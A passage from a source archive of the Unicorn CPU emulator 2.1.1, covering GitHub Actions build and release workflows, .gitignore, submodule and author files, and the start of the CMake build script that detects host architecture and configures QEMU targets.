-S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip ctest -VV -C ${{ matrix.config.build_type }} - name: '🚧 Linux ppc64le/aarch64 build' if: contains(matrix.config.arch, 'ppc64le') || contains(matrix.config.arch, 'aarch64') uses: uraimo/run-on-arch-action@v2 with: arch: ${{ matrix.config.arch }} distro: ${{ matrix.config.distro }} setup: | mkdir -p "${PWD}/instdir" dockerRunArgs: | --volume "${PWD}/instdir:/instdir" shell: /bin/sh install: | apt-get update -q -y apt-get install -q -y git cmake build-essential automake libcmocka-dev pkg-config ${{ matrix.compiler }} ninja-build run: | mkdir build cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=/instdir cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip ctest -VV -C ${{ matrix.config.build_type }} - name: '📦 Pack artifact' if: always() shell: bash working-directory: instdir run: | ls -laR ${{ matrix.config.archiver }} ../${{ matrix.config.artifact }} . ../test* - name: '📤 Upload artifact' if: always() uses: actions/upload-artifact@v4 with: path: ./${{ matrix.config.artifact }} name: ${{ matrix.config.artifact }}unicorn-2.1.1/.github/workflows/prerelease.yml000066400000000000000000000024051467524106700214540ustar00rootroot00000000000000on: push: tags: - 'rc*' workflow_dispatch: name: Upload Prerelease Assets jobs: build: name: Upload Release Assets runs-on: ubuntu-latest steps: - name: Checkout code uses: actions/checkout@v4 - name: Create Release id: create_release uses: actions/create-release@v1 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} with: tag_name: ${{ github.ref }} release_name: Release ${{ github.ref }} draft: true prerelease: true - name: create artifacts directory run: mkdir artifact working-directory: ./ - uses: dawidd6/action-download-artifact@v2 id: download-artifact with: workflow: build-uc2.yml workflow_conclusion: success branch: master path: artifact - name: Display structure of downloaded files run: ls -R working-directory: artifact - name: Upload Release Assets id: upload-release-assets uses: dwenegar/upload-release-assets@v1 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} with: release_id: ${{ steps.create_release.outputs.id }} assets_path: artifactunicorn-2.1.1/.github/workflows/release.yml000066400000000000000000000024021467524106700207420ustar00rootroot00000000000000on: push: tags: - 'v*' workflow_dispatch: name: Upload Release Assets jobs: build: name: Upload Release Assets runs-on: ubuntu-latest steps: - name: Checkout code uses: actions/checkout@v4 - name: Create Release id: create_release uses: actions/create-release@v1 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} with: tag_name: ${{ github.ref }} release_name: Release ${{ github.ref }} draft: true prerelease: false - name: create artifacts directory run: mkdir artifact working-directory: ./ - uses: dawidd6/action-download-artifact@v6 id: download-artifact with: workflow: build-uc2.yml workflow_conclusion: success branch: master path: artifact - name: Display structure of downloaded files run: ls -R working-directory: artifact - name: Upload Release Assets id: upload-release-assets uses: dwenegar/upload-release-assets@v1 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} with: release_id: ${{ steps.create_release.outputs.id }} assets_path: artifactunicorn-2.1.1/.github/workflows/zigbuild.yml000066400000000000000000000056711467524106700211460ustar00rootroot00000000000000name: Zig Build on: push: paths-ignore: - ".gitignore" - "docs/**" - "README" - "CREDITS.TXT" - "COPYING_GLIB" - "COPYING.LGPL2" - "AUTHORS.TXT" - "CHANGELOG" - "COPYING" pull_request: jobs: build-ubuntu: strategy: fail-fast: false matrix: runs-on: [ubuntu-latest] runs-on: ${{ matrix.runs-on }} steps: - uses: actions/checkout@v4 with: submodules: recursive fetch-depth: 0 - uses: goto-bus-stop/setup-zig@v2 with: version: 0.13.0 - uses: lukka/get-cmake@latest with: cmakeVersion: latest ninjaVersion: latest - name: CMake Build run: zig build cmake - name: Build Summary run: zig build --summary all -freference-trace build-macos: strategy: fail-fast: false matrix: runs-on: [macos-latest] runs-on: ${{ matrix.runs-on }} steps: - uses: actions/checkout@v4 with: submodules: recursive fetch-depth: 0 - uses: goto-bus-stop/setup-zig@v2 with: version: 0.13.0 - uses: lukka/get-cmake@latest with: cmakeVersion: latest ninjaVersion: latest # MacOS has a hard process limit that we will hit if we do a # parallel build, so disable parallel cmake build (manual # option set in `build.zig`) - name: CMake Build run: zig build -Dparallel=false cmake - name: Build Summary run: zig build --summary all -freference-trace # =================================================================== # zig-mingw: # runs-on: windows-latest # strategy: # fail-fast: false # matrix: # include: [{ msystem: CLANG64, arch: x86_64, prefix: /clang64 }, { msystem: CLANG32, arch: i686, prefix: /clang32 }, { msystem: CLANGARM64, arch: aarch64, prefix: /clangarm64 }] # steps: # - uses: actions/checkout@v4 # with: # path: temp # submodules: recursive # fetch-depth: 0 # - uses: goto-bus-stop/setup-zig@v2 # with: # version: master # - uses: msys2/setup-msys2@v2 # with: # msystem: ${{ matrix.msystem }} # path-type: inherit # location: D:\ # install: git mingw-w64-clang-${{ matrix.arch }}-cmake # update: true # - name: Move Checkout # run: | # Copy-Item -Path ".\temp" -Destination "C:\_" -Recurse # - name: Build Summary - ${{ matrix.arch }} # shell: msys2 {0} # run: | # cd /C/_ # zig build cmake # if [${{ matrix.config.arch }} == 'i686' ]; then # zig build --summary all -freference-trace -Dtarget=x86-windows # else # zig build --summary all -freference-trace -Dtarget=${{ matrix.arch }}-windows # fi unicorn-2.1.1/.gitignore000066400000000000000000000020231467524106700151710ustar00rootroot00000000000000.DS_Store *.swp *.d *.o *.a *.dSYM *.so *.so.* *.exe *.dll *.class *.jar *.gem *~ qemu/*-softmmu/ tags qemu/config-host.ld qemu/config.log qemu/config.status qemu/config-host.h qemu/config-host.h-timestamp qemu/config-host.mak libunicorn*.dll libunicorn*.so libunicorn*.dylib unicorn.pc unicorn.lib unicorn.dll unicorn.exp unicorn.def unicorn_*.lib unicorn_*.exp unicorn_*.dll *.tgz *.zip *.pyc _*.txt _*.diff tmp/ bindings/python/build/ bindings/python/dist/ bindings/python/src/ bindings/python/unicorn.egg-info/ bindings/python/unicorn/lib/ bindings/python/unicorn/include/ bindings/python/MANIFEST /target/ Cargo.lock config.log ################# ## Visual Studio ################# ## Ignore Visual Studio temporary files, build results, and ## files generated by popular Visual Studio add-ons. # vscode .vscode .vscode/ # User-specific files *.opensdf *.sdf *.suo *.user *.sln.docstates # Build results [Dd]ebug/ [Rr]elease/ x64/ Win32/ build/ build_* rust_build [Bb]in/ [Oo]bj/ packages/ cmocka/ zig-cache/ zig-out/ .cacheunicorn-2.1.1/.gitmodules000066400000000000000000000002301467524106700153540ustar00rootroot00000000000000[submodule "docs/Unicorn_Engine_Documentation"] path = docs/Unicorn_Engine_Documentation url = https://github.com/kabeor/Unicorn-Engine-Documentation unicorn-2.1.1/AUTHORS.TXT000066400000000000000000000001211467524106700147240ustar00rootroot00000000000000Nguyen Anh Quynh Dang Hoang Vu unicorn-2.1.1/CMakeLists.txt000066400000000000000000001372311467524106700157530ustar00rootroot00000000000000# CMake setup for Unicorn 2. # By Huitao Chen & Nguyen Anh Quynh, 2019-2020 cmake_minimum_required(VERSION 3.5) # Only required for MSVC, but we can't know the compiler at this point because we haven't # called enable_language() or project(), and if we did that it would lock in the old # policy. Setting these policies is harmless for non-MSVC though, so just enable them # always. if(CMAKE_VERSION VERSION_GREATER_EQUAL "3.15") # Set explicitly the policies we want rather than raising the base to the current # version. This prevents unintended behavior changes as CMake evolves and provides a # consistent experience across different CMake versions. # CMP0091: prevent msvcrt flags being added to default CMAKE__FLAGS_ cmake_policy(SET CMP0091 NEW) # CMP0092: prevent warning flags being added to default CMAKE__FLAGS for MSVC cmake_policy(SET CMP0092 NEW) endif() # Honor visibility properties for all target types. cmake_policy(SET CMP0063 NEW) option(ZIG_BUILD "Enable zig build" OFF) if(ZIG_BUILD) include(cmake/zig.cmake) endif() # Workaround to fix wrong compiler on macos. if(APPLE AND NOT CMAKE_C_COMPILER) set(CMAKE_C_COMPILER "/usr/bin/cc") endif() # Detect if unicorn is compiled as the top-level project set(PROJECT_IS_TOP_LEVEL OFF) if(CMAKE_CURRENT_SOURCE_DIR STREQUAL CMAKE_SOURCE_DIR) set(PROJECT_IS_TOP_LEVEL ON) # Enable folder support set_property(GLOBAL PROPERTY USE_FOLDERS ON) endif() project(unicorn C) # We depend on the availability of the CMAKE_MSVC_RUNTIME_LIBRARY, which is only # available in CMake 3.15 and above (see also the comments above in regards to policy # CMP0091). if(MSVC AND CMAKE_VERSION VERSION_LESS "3.15") message(FATAL_ERROR "Please update CMake to 3.15 or greater.") endif() # mainline qemu mostly just uses compiler default set(CMAKE_C_STANDARD 11) set(UNICORN_VERSION_MAJOR 2) set(UNICORN_VERSION_MINOR 1) set(UNICORN_VERSION_PATCH 1) include(cmake/bundle_static.cmake) # Even though we generate shared lib and static archive at the same time, we still support # using unicorn as a subdirectory so we have to respect BUILD_SHARED_LIBS. # # Also we would like users to link a native cmake target, instead of a custom target for better # compatability. option(BUILD_SHARED_LIBS "Build shared instead of static library" ${PROJECT_IS_TOP_LEVEL}) option(UNICORN_FUZZ "Enable fuzzing" OFF) option(UNICORN_LOGGING "Enable logging" OFF) option(UNICORN_BUILD_TESTS "Build unicorn tests" ${PROJECT_IS_TOP_LEVEL}) option(UNICORN_INSTALL "Enable unicorn installation" ${PROJECT_IS_TOP_LEVEL}) set(UNICORN_ARCH "x86;arm;aarch64;riscv;mips;sparc;m68k;ppc;s390x;tricore" CACHE STRING "Enabled unicorn architectures") option(UNICORN_TRACER "Trace unicorn execution" OFF) foreach(ARCH_LOOP ${UNICORN_ARCH}) string(TOUPPER "${ARCH_LOOP}" ARCH_LOOP) set(UNICORN_HAS_${ARCH_LOOP} TRUE) endforeach() if(MSVC) include_directories( ${CMAKE_CURRENT_SOURCE_DIR}/msvc ) else() include_directories( ${CMAKE_BINARY_DIR} ) endif() include_directories( glib_compat qemu qemu/include include qemu/tcg ) # QEMU logging facility if (UNICORN_LOGGING) add_compile_options(-DUNICORN_LOGGING) endif() # Some distributions on some rare architecures don't auto link atomic for us and # we do this manually by adding flags. set(ATOMIC_LINKAGE_FIX FALSE) if(MSVC) if(CMAKE_SIZEOF_VOID_P EQUAL 8) set(MSVC_FLAG -D__x86_64__) elseif(CMAKE_SIZEOF_VOID_P EQUAL 4) set(MSVC_FLAG -D__i386__) else() message(FATAL_ERROR "Neither WIN64 or WIN32!") endif() add_compile_options( -Dinline=__inline -D__func__=__FUNCTION__ -D_CRT_SECURE_NO_WARNINGS -DWIN32_LEAN_AND_MEAN ${MSVC_FLAG} /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/tcg/i386 ) # Disable some warnings add_compile_options($<$:/wd4018>) add_compile_options($<$:/wd4098>) add_compile_options($<$:/wd4244>) add_compile_options($<$:/wd4267>) # handle msvcrt setting being passed in CMAKE_C_FLAGS if(CMAKE_C_FLAGS MATCHES "[/-]M[TD]d?") # ensure CMAKE_MSVC_RUNTIME_LIBRARY is not already defined if(DEFINED CMAKE_MSVC_RUNTIME_LIBRARY) message(FATAL_ERROR "please set the runtime library via either CMAKE_C_FLAGS or CMAKE_MSVC_RUNTIME_LIBRARY, not both") endif() if(CMAKE_C_FLAGS MATCHES "[/-]MTd") set(CMAKE_MSVC_RUNTIME_LIBRARY "MultiThreadedDebug") elseif(CMAKE_C_FLAGS MATCHES "[/-]MDd") set(CMAKE_MSVC_RUNTIME_LIBRARY "MultiThreadedDebugDLL") elseif(CMAKE_C_FLAGS MATCHES "[/-]MT") set(CMAKE_MSVC_RUNTIME_LIBRARY "MultiThreaded") elseif(CMAKE_C_FLAGS MATCHES "[/-]MD") set(CMAKE_MSVC_RUNTIME_LIBRARY "MultiThreadedDLL") endif() # prevent the arg from occurring more than once (not a big deal, just to keep tidy) string(REGEX REPLACE "[/-]M[TD]d?" "" CMAKE_C_FLAGS ${CMAKE_C_FLAGS}) endif() else() if(MINGW) execute_process(COMMAND ${CMAKE_C_COMPILER} -dumpmachine OUTPUT_VARIABLE UC_COMPILER_VERSION) string(FIND "${UC_COMPILER_VERSION}" "i686" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "i386") set(UNICORN_CFLAGS -m32 -static-libgcc) # Workaround for github action bugs set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -m32") set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -m32") else() set(UNICORN_TARGET_ARCH "i386") set(UNICORN_CFLAGS -m64 -mcx16) set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -m64") set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -m64") endif() elseif(ANDROID_ABI) string(FIND "${ANDROID_ABI}" "arm64" UC_RET) file(WRITE ${CMAKE_BINARY_DIR}/adb.sh "#!/bin/bash\n\n# Auto-generated by CMakeLists.txt\n\nadb shell mkdir -p /data/local/tmp/build\n") if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "aarch64") else() string(FIND "${ANDROID_ABI}" "armeabi" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "arm") else() set(UNICORN_TARGET_ARCH "i386") endif() endif() else() execute_process(COMMAND ${CMAKE_C_COMPILER} -dM -E - INPUT_FILE /dev/null OUTPUT_VARIABLE UC_COMPILER_MACRO) while(TRUE) string(FIND "${UC_COMPILER_MACRO}" "__x86_64__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "i386") string(FIND "${UC_COMPILER_MACRO}" "__ILP32__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_CFLAGS -mx32) set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -mx32") set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -mx32") else() set(UNICORN_CFLAGS -m64 -mcx16) set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -m64") set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -m64") endif() break() endif() string(FIND "${UC_COMPILER_MACRO}" "__i386__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "i386") break() endif() string(FIND "${UC_COMPILER_MACRO}" "__arm__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "arm") set(ATOMIC_LINKAGE_FIX TRUE) break() endif() string(FIND "${UC_COMPILER_MACRO}" "__aarch64__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "aarch64") break() endif() string(FIND "${UC_COMPILER_MACRO}" "__mips__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "mips") set(ATOMIC_LINKAGE_FIX TRUE) break() endif() string(FIND "${UC_COMPILER_MACRO}" "__sparc__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "sparc") set(ATOMIC_LINKAGE_FIX TRUE) break() endif() string(FIND "${UC_COMPILER_MACRO}" "__ia64__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "ia64") break() endif() string(FIND "${UC_COMPILER_MACRO}" "_ARCH_PPC" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "ppc") set(ATOMIC_LINKAGE_FIX TRUE) break() endif() string(FIND "${UC_COMPILER_MACRO}" "__riscv" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "riscv") set(ATOMIC_LINKAGE_FIX TRUE) break() endif() string(FIND "${UC_COMPILER_MACRO}" "__s390__" UC_RET) if(${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "s390") set(ATOMIC_LINKAGE_FIX TRUE) break() endif() string(FIND ${UC_COMPILER_MACRO} "__tricore__" UC_RET) if (${UC_RET} GREATER_EQUAL "0") set(UNICORN_TARGET_ARCH "tricore") break() endif() message(FATAL_ERROR "Unknown host compiler: ${CMAKE_C_COMPILER}.") endwhile(TRUE) endif() set(EXTRA_CFLAGS "--extra-cflags=") if(UNICORN_HAS_X86) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_X86 ") endif() if(UNICORN_HAS_ARM) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_ARM ") endif() if(UNICORN_HAS_AARCH64) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_ARM64 ") endif() if(UNICORN_HAS_M68K) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_M68K ") endif() if(UNICORN_HAS_MIPS) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_MIPS -DUNICORN_HAS_MIPSEL -DUNICORN_HAS_MIPS64 -DUNICORN_HAS_MIPS64EL ") endif() if(UNICORN_HAS_SPARC) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_SPARC ") endif() if(UNICORN_HAS_PPC) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_PPC ") endif() if(UNICORN_HAS_RISCV) set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_RISCV ") endif() if (UNICORN_HAS_S390X) set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_S390X ") endif() if (UNICORN_HAS_TRICORE) set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_TRICORE ") endif() set(EXTRA_CFLAGS "${EXTRA_CFLAGS}-fPIC") if(ANDROID_ABI) set(EXTRA_CFLAGS "${EXTRA_CFLAGS} --target=${CMAKE_C_COMPILER_TARGET}") set(EXTRA_CFLAGS "${EXTRA_CFLAGS} --sysroot=${CMAKE_SYSROOT}") endif() if(UNICORN_FUZZ) set(EXTRA_CFLAGS "${EXTRA_CFLAGS} ${CMAKE_C_FLAGS}") endif() if(UNICORN_TRACER) set (EXTRA_CFLAGS "${EXTRA_CFLAGS} -DUNICORN_TRACER") endif() if (ATOMIC_LINKAGE_FIX) set (EXTRA_CFLAGS "${EXTRA_CFLAGS} -latomic") endif() if (CMAKE_OSX_SYSROOT) # https://github.com/unicorn-engine/unicorn/issues/1917 set (EXTRA_CFLAGS "${EXTRA_CFLAGS} -isysroot ${CMAKE_OSX_SYSROOT} ") endif() set(TARGET_LIST "--target-list=") if(UNICORN_HAS_X86) set(TARGET_LIST "${TARGET_LIST}x86_64-softmmu, ") endif() if(UNICORN_HAS_ARM) set(TARGET_LIST "${TARGET_LIST}arm-softmmu, ") endif() if(UNICORN_HAS_AARCH64) set(TARGET_LIST "${TARGET_LIST}aarch64-softmmu, ") endif() if(UNICORN_HAS_M68K) set(TARGET_LIST "${TARGET_LIST}m68k-softmmu, ") endif() if(UNICORN_HAS_MIPS) set(TARGET_LIST "${TARGET_LIST}mips-softmmu, mipsel-softmmu, mips64-softmmu, mips64el-softmmu, ") endif() if(UNICORN_HAS_SPARC) set(TARGET_LIST "${TARGET_LIST}sparc-softmmu, sparc64-softmmu, ") endif() if(UNICORN_HAS_PPC) set(TARGET_LIST "${TARGET_LIST}ppc-softmmu, ppc64-softmmu, ") endif() if(UNICORN_HAS_RISCV) set(TARGET_LIST "${TARGET_LIST}riscv32-softmmu, riscv64-softmmu, ") endif() if(UNICORN_HAS_S390X) set(TARGET_LIST "${TARGET_LIST}s390x-softmmu, ") endif() if (UNICORN_HAS_TRICORE) set (TARGET_LIST "${TARGET_LIST}tricore-softmmu, ") endif() set(TARGET_LIST "${TARGET_LIST} ") # GEN config-host.mak & target directories execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/configure --cc=${CMAKE_C_COMPILER} ${EXTRA_CFLAGS} ${TARGET_LIST} WORKING_DIRECTORY ${CMAKE_BINARY_DIR} ) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/config-host.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/config-host.h ) if(UNICORN_HAS_X86) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/x86_64-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/x86_64-softmmu/config-target.h ) endif() if(UNICORN_HAS_ARM) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/arm-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/arm-softmmu/config-target.h ) endif() if(UNICORN_HAS_AARCH64) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/aarch64-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/aarch64-softmmu/config-target.h ) endif() if(UNICORN_HAS_M68K) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/m68k-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/m68k-softmmu/config-target.h ) endif() if(UNICORN_HAS_MIPS) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/mips-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/mips-softmmu/config-target.h ) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/mipsel-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/mipsel-softmmu/config-target.h ) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/mips64-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/mips64-softmmu/config-target.h ) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/mips64el-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/mips64el-softmmu/config-target.h ) endif() if(UNICORN_HAS_SPARC) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/sparc-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/sparc-softmmu/config-target.h ) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/sparc64-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/sparc64-softmmu/config-target.h ) endif() if(UNICORN_HAS_PPC) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/ppc-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/ppc-softmmu/config-target.h ) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/ppc64-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/ppc64-softmmu/config-target.h ) endif() if(UNICORN_HAS_RISCV) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/riscv32-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/riscv32-softmmu/config-target.h ) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/riscv64-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/riscv64-softmmu/config-target.h ) endif() if (UNICORN_HAS_S390X) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/s390x-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/s390x-softmmu/config-target.h ) endif() if (UNICORN_HAS_TRICORE) execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config INPUT_FILE ${CMAKE_BINARY_DIR}/tricore-softmmu/config-target.mak OUTPUT_FILE ${CMAKE_BINARY_DIR}/tricore-softmmu/config-target.h ) endif() add_compile_options( ${UNICORN_CFLAGS} -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/tcg/${UNICORN_TARGET_ARCH} -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -Wall -fPIC ) if (ATOMIC_LINKAGE_FIX) add_compile_options( -latomic ) endif() if(APPLE) # This warning is disabled by default for gcc and doesn't cause any bug. add_compile_options( -Wno-missing-braces ) endif() endif() set(UNICORN_ARCH_COMMON qemu/exec.c qemu/exec-vary.c qemu/softmmu/cpus.c qemu/softmmu/ioport.c qemu/softmmu/memory.c qemu/softmmu/memory_mapping.c qemu/fpu/softfloat.c qemu/tcg/optimize.c qemu/tcg/tcg.c qemu/tcg/tcg-op.c qemu/tcg/tcg-op-gvec.c qemu/tcg/tcg-op-vec.c qemu/accel/tcg/cpu-exec.c qemu/accel/tcg/cpu-exec-common.c qemu/accel/tcg/cputlb.c qemu/accel/tcg/tcg-all.c qemu/accel/tcg/tcg-runtime.c qemu/accel/tcg/tcg-runtime-gvec.c qemu/accel/tcg/translate-all.c qemu/accel/tcg/translator.c qemu/softmmu/unicorn_vtlb.c ) if(UNICORN_HAS_X86) add_library(x86_64-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/hw/i386/x86.c qemu/target/i386/arch_memory_mapping.c qemu/target/i386/bpt_helper.c qemu/target/i386/cc_helper.c qemu/target/i386/cpu.c qemu/target/i386/excp_helper.c qemu/target/i386/fpu_helper.c qemu/target/i386/helper.c qemu/target/i386/int_helper.c qemu/target/i386/machine.c qemu/target/i386/mem_helper.c qemu/target/i386/misc_helper.c qemu/target/i386/mpx_helper.c qemu/target/i386/seg_helper.c qemu/target/i386/smm_helper.c qemu/target/i386/svm_helper.c qemu/target/i386/translate.c qemu/target/i386/xsave_helper.c qemu/target/i386/unicorn.c ) if(MSVC) target_compile_options(x86_64-softmmu PRIVATE -DNEED_CPU_H /FIx86_64.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/x86_64-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/i386 ) else() target_compile_options(x86_64-softmmu PRIVATE -DNEED_CPU_H -include x86_64.h -I${CMAKE_BINARY_DIR}/x86_64-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/i386 ) # Log and pow target_link_libraries(x86_64-softmmu PRIVATE m) endif() if(UNICORN_TRACER) target_compile_options(x86_64-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if(UNICORN_HAS_ARM) add_library(arm-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/arm/cpu.c qemu/target/arm/crypto_helper.c qemu/target/arm/debug_helper.c qemu/target/arm/helper.c qemu/target/arm/iwmmxt_helper.c qemu/target/arm/m_helper.c qemu/target/arm/neon_helper.c qemu/target/arm/op_helper.c qemu/target/arm/psci.c qemu/target/arm/tlb_helper.c qemu/target/arm/translate.c qemu/target/arm/vec_helper.c qemu/target/arm/vfp_helper.c qemu/target/arm/unicorn_arm.c ) if(MSVC) target_compile_options(arm-softmmu PRIVATE -DNEED_CPU_H /FIarm.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/arm-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/arm ) else() target_compile_options(arm-softmmu PRIVATE -DNEED_CPU_H -include arm.h -I${CMAKE_BINARY_DIR}/arm-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/arm ) endif() if(UNICORN_TRACER) target_compile_options(arm-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if(UNICORN_HAS_AARCH64) add_library(aarch64-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/arm/cpu64.c qemu/target/arm/cpu.c qemu/target/arm/crypto_helper.c qemu/target/arm/debug_helper.c qemu/target/arm/helper-a64.c qemu/target/arm/helper.c qemu/target/arm/iwmmxt_helper.c qemu/target/arm/m_helper.c qemu/target/arm/neon_helper.c qemu/target/arm/op_helper.c qemu/target/arm/pauth_helper.c qemu/target/arm/psci.c qemu/target/arm/sve_helper.c qemu/target/arm/tlb_helper.c qemu/target/arm/translate-a64.c qemu/target/arm/translate.c qemu/target/arm/translate-sve.c qemu/target/arm/vec_helper.c qemu/target/arm/vfp_helper.c qemu/target/arm/unicorn_aarch64.c ) if(MSVC) target_compile_options(aarch64-softmmu PRIVATE -DNEED_CPU_H /FIaarch64.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/aarch64-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/arm ) else() target_compile_options(aarch64-softmmu PRIVATE -DNEED_CPU_H -include aarch64.h 